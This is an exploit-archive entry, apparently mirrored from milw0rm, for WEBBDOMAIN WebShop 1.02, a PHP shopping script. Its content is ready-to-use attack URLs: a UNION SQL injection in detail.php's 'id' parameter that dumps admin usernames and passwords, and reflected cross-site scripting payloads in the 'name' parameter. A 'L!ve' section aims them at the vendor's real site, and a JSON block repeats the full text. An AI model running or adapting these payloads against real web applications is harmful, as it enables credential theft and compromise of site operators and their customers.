Search...

WEBBDOMAIN WebShop 1.02 - SQL Injection Cross-Site Scripting

2008-11-04T00:00:00

ID EXPLOITPACK:6413D09A0F04B73E744EAC9150ED04A7
Type exploitpack
Reporter G4N0K
Modified 2008-11-04T00:00:00

Description

WEBBDOMAIN WebShop 1.02 - SQL Injection Cross-Site Scripting

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                            			IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Multi Languages WebShop Online
[~] Language :         	PHP
[~] Website[0]:     	http://webbdomain.com/php/webshopir/
[~] Website[1]:     	http://www.hotscripts.com/Detailed/84437.html
[~] Type :             	Commercial
[~] Report-Date :     	04/11/2008


--[ Founder ]--
G4N0K &lt;mail.ganok[at]gmail.com&gt;


--[ Exploit ]--
SQL =&gt; id
[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
    http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK

XSS =&gt; name
[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13
[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]



--[ L!ve ]--
[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
      http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 &lt;Tornado2800[at]gmail.com&gt;
[~] Hussain-X &lt;darkangel_g85[at]yahoo.com&gt;

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-04]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:54", "references": [], "description": "\nWEBBDOMAIN WebShop 1.02 - SQL Injection Cross-Site Scripting", "edition": 1, "reporter": "G4N0K", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2008-11-04T00:00:00", "title": "WEBBDOMAIN WebShop 1.02 - SQL Injection Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:54", "rev": 2}, "score": {"value": 0.0, "vector": "NONE", "modified": "2020-04-01T19:04:54", "rev": 2}, "vulnersScore": 0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-11-04T00:00:00", "id": "EXPLOITPACK:6413D09A0F04B73E744EAC9150ED04A7", "href": "", "viewCount": 1, "sourceData": "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n \t\t\tIN THE NAME OF ALLAH\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nMulti Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n[~] Script: \tMulti Languages WebShop Online\n[~] Language : \tPHP\n[~] Website[0]: \thttp://webbdomain.com/php/webshopir/\n[~] Website[1]: \thttp://www.hotscripts.com/Detailed/84437.html\n[~] Type : \tCommercial\n[~] Report-Date : \t04/11/2008\n\n\n--[ Founder ]--\nG4N0K <mail.ganok[at]gmail.com>\n\n\n--[ Exploit ]--\nSQL => id\n[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--\n http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK\n\nXSS => name\n[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13\n[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]\n\n\n\n--[ L!ve ]--\n[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--\n http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK\n[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13\n[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E\n\n\n--[ Greetz ]--\n[~] ALLAH\n[~] Tornado2800 <Tornado2800[at]gmail.com>\n[~] Hussain-X <darkangel_g85[at]yahoo.com>\n\n//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\n//ALLAH, forgimme...\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nexit(); //EoX\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# milw0rm.com [2008-11-04]", "cvss": {"score": 0.0, "vector": "NONE"}}